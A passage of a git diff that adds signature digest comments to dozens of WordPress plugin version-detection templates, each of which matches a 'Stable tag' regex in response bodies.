a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050ab2f026b268a1ab1c8058cb0cedff35fcccd9e9af8da803d2828a99ce1c7aa022040b4622addd408efaa8e07ab1a2a1d5864b7040dc99f873b9cb46ad55cffff29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 7776b209df..75e508706b 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e0993d32f06ebf9552d3c83c85d41e9d333796b6b8b82190f3cbeb085fa278e022100fd7a0475b1747d2a999fd765498c674965d08ba7c75113e2791c10570cfe7ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..a9baffcaed 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac26591f51e3cc8b830c36600b0e92f4398b30ace389d6638db4d196fcae137d02204737a89057bd996a7cdf25b941c90dae5d80fdf48324a2bfcbb04c7b9c60ce80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..d0af952337 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015450df502f39f4e6da733f42b5ee69898ad0c3d45cd7d731b492173fca3a762022077f39ff9e72d971a89d6694009ff50eb21ca21dcafa4317b53af11825389d1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..d2da21468b 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049a7db5ef1dc0d566bd1da0245700c3c715b8f05bb1b5fcad63845692ae25edf022100ea9cbb39bee069c526d620436e8ea5e645924d1fac85becd4ef47a2695790878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..4af54b493d 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100861fd87b58f4a5d356ccfeb97dd926ff1552ef42bffeaf5ffeca0df3fa207ca4022035c6bd31cac4f4ec410744948b48a3cb77ad50aba0ab22f5aaa5943578d88374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..3232d2370f 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b27f262b5100187f39fd4dbce8d7c23bb54c3d5d5e1f732f3d42d6d73a2304802207358ba0e1bc7d12059867e101c12f096fabd23f880bf65fc34b49d6edf64a803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..ec52713950 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066012572d25c94922d65b7894155cfe946411f915a1868cddfe4350b0d7cd3b7022100c6aacd2f75506a6354ec6b39ab82ac456b9de3decd672fa6c5356d3c8360db74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 9d77ce9155..1da56bd3a5 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b4ac96986879faacf13bd98d69a68a0a75d42d9eaea3fc67fdc6f32a2080eac202203b51754f4c5a914b8d296d7446647159bb94b460bb97e3fb4f8280b0ecf24bf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..6058fd3327 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c503610e368f018fbc2493ec03de072ec8401d1e7fc7eb78e47bc036c6d0452022064ea5df1438521f06a3844eb377678140acbd2492f25d67e21e1a97148c6b27a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..ddc669a179 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d39294d70e002763e766c206f33c94bc9d21e3d3c59ce42bcae9028a23d56096022100cd53120009c945be24235464ecab7891185849c1ad44a2a641ece5822ef44523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..75f9a9f239 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097a2ec507157614c9969305a76cb6fb6725a36eb37fe140bc963d81062e37d0202210080abcdd860041973499c8aebd2c4ba978c39e338ffda03734ff6747b25e02469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 34d36d4349..923311bc06 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050769a5a20d4cf414fb5de51006a49b1fa65cc4b77ef2d8c40dd45fd12b2ecec02205e3a95fdb9c370c2a5ff974b8827e60a448c40ef3efe77deefe237dd7daa7be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..cfe5c930cf 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022044fbab6082c8a66ed21762bde1df4e926bcd9f06deee5fd3235f27d9e6c91b390221009554d03519be01faef99136e4d037107dfaf8f7019ef7e08d4115181687a575d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 39b176dcb8..909f097c23 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3aa57fb44259b36343c0db6aefa098346b64f105e58841ca51d2b54e87c8984022100ee81cb5e3426ffe6291077d21fd1b32478fdae713f3c7037deac35321b57f902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..fdb0d42fdf 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017f47e2dcf2275624da6293dabcac3e5df4d417125eac3b41d7865569f946c780220216dd435dbb50b60875c08beb38d482f11baff933e5a1163ac1cece049d5adc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..c87c17aeb5 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220202805a09cdbc4f379d059a78b5d5b4d5a84460b5ec5dbf1634a73c01fb5eb51022037021e403fc73700dc259cfd09cb60ae9b22b416898146d20aba3106a9cab041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..ca1db01da9 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100efe91cb227f42ed6f3e97960618e2dec3e886173aaf7e33d5d11ea76277f8fd2022100d27cf5d9820dd75f95fcb7abaf35b7c0aef0e7f84ab17177915b34913f9a37b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..660f02d5d4 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aea12848dcd4dce092a88b832733253b26df63c903a9c4a5d96f01285287cd9002202c2636aa816ccb323d95f095078cf442182d37c9d68ec5914a61b0157bc63051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..2338b82b21 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd5be8ec532ab536405d8e0594d00dad45a7581ac12468f7686a86218b714d0a022100d60c3c0936ec481b8550dc439b0a9e2ce43bc25f812fda328a566b4320f31260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..a4ee458100 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062f4b720da25a772797ab143d6c2b78378629c88decea878e71c14becc5805a9022100fa8721f99bca7d1f672b4004493ee5ea8015ce70d3667caf31f04d2474ac4f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..9ecc93011a 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2746537cc8c21654236583b1886e960b69f6a7b9d05b1858e4f20f28a9265cf02205388bf0244e33608c43dc23d8c23cc121f226c95e1435e4e917ac331361e08fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..132d603114 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6b86d290f40b245b83295ed984a0ebaec54a525edba8ce89c95e127c49a7f250220288181f02d708f440b8c06ac192936b838a7dd9c76622eb51bdc2de4bdb23f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..dd941b8230 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc13fa55d7029191a6681a4f49b5bc9bb0d27640074f022527953e6d8ead1148022100eb5eb036b680ef7167dbd9e1047694cfbc4851af3d41de8a8760f2c4febfa91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4c9f2c7c4..f601350745 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b161f8acfa68d06824d8f75e7caf6fa3cc5a92141972f9e328a3b6984c90b72602206a3790758ddc7720bf36366abad39350c40e045385c9de5d4145ec16df982cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1fd49d2e08..19630aa318 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201373f17763bdbc44f9f4e0e85d30fbd528b30797babfbafda2c33af0b006d22202202f0b9959b6f6ff11577d5f8347e778054c749e58829e652bd3b6c85df301aac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..afed5f3b0a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009639f50d511255d59e92a76f5157731b0825d4662eb5d38f5fefa43f9a7bc398022100ae759590a63cf56c247cce65872dd045fea2c65ab9a5bcd541a3a476a6c34347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..1e2ba6bf61 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008af5cc4b5ed4cf3369766219bbd509ef2c0d8985565130e7db25290c61ee4d9022012ff3fc6a9f2bfecb21925978c986b2b29d0958bc12fabdd45442071665cdede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..4e09db85ee 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9d28ac8f1e2dbc63f9a07fc47b1b32f3b7c2dfe2527233354474ee5820c592a022100eee5dd439f0435adf6afa9043d1b96d1c6016e15c54aa31ddaede0a865a122dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..5fee367845 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fbdb3b4c2647a590f0d47ad92a270a90d8df6e52626a9d624e66b6c8fd796963022100da018c38d7a09b0f89d218dfbd4111a353c5708c561fd93564a56431f8a791aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..3a88a7df69 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097c293545df50293724fc78f8a75007840337fc3f577845f8a8af888bf37a4be022100db39e94048511ccd86397739e48bec0fd9e888e3865ab6cb204c9a3b80cd9d73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..6a6db8841f 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f31aa1985a798cb83f8458c5c8591d657ae7f405a30cc8182aae8e63615784902206109726cecf0b5c46fe101e202af06785cdd734b9d8574eddf090f96b8867c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..842794d59a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205eede1c7feaa47bf947700c28eb710a2c9886f06306f0d0c6f49f6918dd61f9402206fac703db79bb577951c7695413516a92a0f84fb45c349e9959c5fb20e491140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7b3e6f07b9 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220764a9f3033a3cd91bff5f05d50c2b9a05f426b4d974566000ccc34e7644a780a02200eb9020c8ed5c3809ecc3bd2f31311e5e882892f979d2f488640f271a5212dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..5259ac2cec 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a5371ce258195fbcd8571faa7a0e7bb8fbfc9290bb39a9ef38247ae007032d10221008acaaa8ef199ab0c4bc01d5750faac09fbb789b5ce7adaa694a266405ad554c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..fe97ec0b48 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3f58191318a9abc2cd62c4be7f914bf5a26d4d08a3f0beae18e22b39059a47402210093573456f8b47ca880782c83d6f808c56eda2dd7cdd5d309e99b0c638aa3fd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..3f5159f2f6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200495099340436207c8caff4fa454e72ff726040eda93641f5f504d5ab4ab91a902203f4f5213295386f341fe8b6b3daf563c0c4503760916a126f307cba1f2aef603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..9525568f07 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e0501d0e3c1238ee02e75b13d56f906228c0619fe150716b6ef1852b436ffb602203a8ee6b1ac44ebfad6972cb76912e4ca389eb94c27ac95c0bb466df299f713ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..fd6867a882 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052134a8a85843cc87799bbd5e9246ce5a9c17e2d4bd1dccf4b0ceef27bd1693b022100934f6ad05d8afe3075f04c1ff899a947d02beee4b3c4acb4cac90f82fb8e66ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..53df65b711 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034c61560f9f37c353cca55ff5e459f7e760168d42f93007277256492730dc0ad02201a766a6aad16f5f1fcba8f3ac67fc78128b90fa8817c6fc4f245a8e46fd04c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..01e0363feb 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ceb06c494c6ccb9bc5470b7da4bfce4768374a6b8ce6730b7e8822259cb9887402204ebf6ac97fdffa5a9bad6eb219c42b8b409b8531657ed65dcf5cef3b683385b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 34115bcd0f..d6a69a409d 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201db331b43ab947ede1b4e42ddcbf1ba461adbc114f0de47c1ac07725fc2bbfe8022100b5f008630b116a8730c85a4c8462892e3add75d9580717e066a878b501736010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..ab94b86dce 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b14cf2a0b3591d18837b14abbad6e9df7c9cb74e95f3198e66ef098a5463d03d02206c21a25397575144406dfa322bd512f07db49837706b83f0d26d8e1bbb32adb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..742b27655b 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ee6d5f8a4b34485317a7478dc1b68ae36892697dfe7526e78cb20afd0a9db620220629dd1e641bbfce8bcc255f5b40ada08a0f7b968e22f7ed2eee847cdf5b82fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..7d625110d5 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085a793d54edbd93dabc1cc989134d164b63cee8e4e114ea797c03b3c6efeb7ba022100ec836a771abf3861518526486d28521227e6bc83e542858f846db08fa12dad37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c3ec4ebd80..fd2eb1a500 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be2af5dc88451aa7f61d43dbdf6c50b477a1d5e64bb563aed46fbe0a475917d5022100d8cdd1b17948a35c6d5633933da4d916380b4a502b7f794fc8a218dd4b439879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..2f11170db5 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 